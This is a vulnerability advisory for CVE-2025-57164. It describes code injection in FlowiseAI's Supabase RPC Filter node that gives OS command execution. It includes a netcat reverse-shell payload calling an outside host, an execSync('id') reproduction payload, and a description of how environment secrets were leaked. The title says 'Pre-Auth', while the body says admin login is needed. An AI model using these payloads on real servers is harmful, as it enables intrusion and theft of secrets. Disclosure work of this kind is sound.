CVE-2025-57164
FlowiseAI Pre-Auth Arbitrary Code Execution
Description
## Summary An authenticated admin user of **FlowiseAI** can exploit the **Supabase RPC Filter** component to execute **arbitrary server-side code** without restriction. By injecting a malicious payload into the filter expression field, the attacker can directly trigger JavaScript's `execSync()` to launch reverse shells, access environment secrets, or perform any OS-level command execution. This results in **full server compromise** and severe breach of trust boundaries between frontend input and backend execution logic. ## Details FlowiseAI includes a component called `Supabase.ts`, located at: `packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237` <img width="622" height="177" alt="image(3)" src="https://github.com/user-attachments/assets/f30ccd12-4709-44ac-a6ef-8f57a1cb5c3b" /> This creates a function from user-provided string `supabaseRPCFilter` with no filtering, escaping, or sandboxing in place. Any injected JavaScript in this string is compiled and executed **immediately** when the node is triggered. ### Exploit We configured our environment to use Supabase entities as follows: <img width="573" height="765" alt="image(4)" src="https://github.com/user-attachments/assets/b8c721db-7b6b-4fb4-99c1-a4b0c3f98caf" /> To confirm the vulnerability, a filter expression was crafted to forcibly raise an error and expose sensitive environment variables: <img width="1920" height="915" alt="image(5)" src="https://github.com/user-attachments/assets/19e377dd-fd78-4437-b2d4-48c72d75f947" />   This results in the **JWT secret being printed** to the frontend, confirming access to server-side environment variables. Subsequently, a **reverse shell** was successfully established using: `filter(process.mainModule.require("child_process").execSync("nc [REDACTED] 9999 -e /bin/sh"), "gt", 5)` <img width="425" height="475" alt="image(6)" src="https://github.com/user-attachments/assets/6dde2461-8db4-4d8d-8318-7b7171a32eb4" /> This proves arbitrary OS-level command execution is possible **within the FlowiseAI backend runtime context**. ## Steps to Reproduce 1. Deploy a FlowiseAI instance with the Supabase vector store enabled. 2. Login as an admin user. 3. Drag in a `Supabase` node and configure "Supabase RPC Filter". 4. Insert a malicious payload in the filter expression, such as: `process.mainModule.require("child_process").execSync("id")` 5. Trigger the chatbot or workflow to activate the node. 6. Observe execution of arbitrary code on the backend. ## Impact - **Remote Code Execution** (RCE): Full OS-level code execution from frontend user input. - **Environment Leakage**: Access to sensitive env variables like `JWT_REFRESH_TOKEN_SECRET`. - **Reverse Shells**: Ability to connect out of the server and gain interactive remote shell access. - **Persistence Risk**: Attacker can install malware, establish persistence, or exfiltrate data. - **LLM Prompt Tampering**: Malicious outputs may be injected back into LLM chains. ## Trust Boundary Violation The vulnerability breaks the boundary between frontend node configuration and backend execution logic. An attacker-supplied value (`supabaseRPCFilter`) becomes part of **compiled JavaScript logic**, blending user-controlled input with trusted backend execution. This violates **OWASP LLM Top 10 - LLM-06: Sensitive Code Execution**, especially in low-code / visual LLM agents. ## Evidence *Environment variable leakage via malformed JSON* *Reverse shell successfully triggered using attacker-controlled input* ## Credit **This report was prepared by Team 404 Not Found 퇴근 (WhiteHat School 3rd cohort, South Korea)**